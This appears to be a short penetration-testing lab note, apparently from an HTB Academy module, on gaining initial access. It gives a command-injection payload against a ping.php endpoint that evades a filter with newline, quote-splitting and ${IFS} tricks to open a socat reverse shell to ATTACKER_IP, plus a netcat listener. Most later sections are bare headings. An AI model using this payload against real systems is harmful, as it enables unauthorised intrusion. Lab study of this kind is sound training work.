πInitial Access
π― Overview
Initial Access transforms external reconnaissance into stable internal network foothold. This phase focuses on converting command injection into reverse shells, TTY upgrades, and privilege escalation to establish persistent access for internal Active Directory attacks.
π Reverse Shell Establishment
π§ Socat Reverse Shell (Filter Bypass)
# Base socat command (filtered):
socat TCP4:ATTACKER_IP:PORT EXEC:/bin/bash
# Filter bypass payload:
GET /ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:ATTACKER_IP:8443${IFS}EXEC:bash
# Explanation:
%0a # Newline character (command separator bypass)
's'o'c'a't' # Single quotes around each character (command bypass)
${IFS} # Environment variable for space bypassπ§ Listener Setup
# Start netcat listener
nc -nvlp 8443
# Expected connection:
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 51496
uid=1004(webdev) gid=1004(webdev) groups=1004(webdev),4(adm)π TTY Upgrade Process
π οΈ Socat Interactive Terminal
π Alternative Python TTY
π Privilege Escalation Discovery
π Audit Log Analysis
π Credential Extraction from Logs
πΊ User Escalation
π Network Position Analysis
π Network Interface Discovery
π― Host Information
π Persistence Preparation
π‘οΈ Access Maintenance Strategy
π Next Steps Planning
π― HTB Academy Lab
π Lab Solution Summary
π Learning Objectives
π‘οΈ Defensive Recommendations
π Application Security
Last updated